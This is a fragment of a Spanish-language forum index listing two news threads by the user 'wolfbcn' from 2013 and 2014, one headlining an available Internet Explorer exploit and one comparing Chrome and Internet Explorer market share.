	El exploit de Internet Explorer ya está disponible por la red Noticias	wolfbcn	0	1,605	2 Octubre 2013, 18:31 pm por wolfbcn
	¿Que Navegador lidera Internet, Chrome o Internet Explorer? Noticias	wolfbcn	0	2,308	5 Enero 2014, 02:22 am por wolfbcn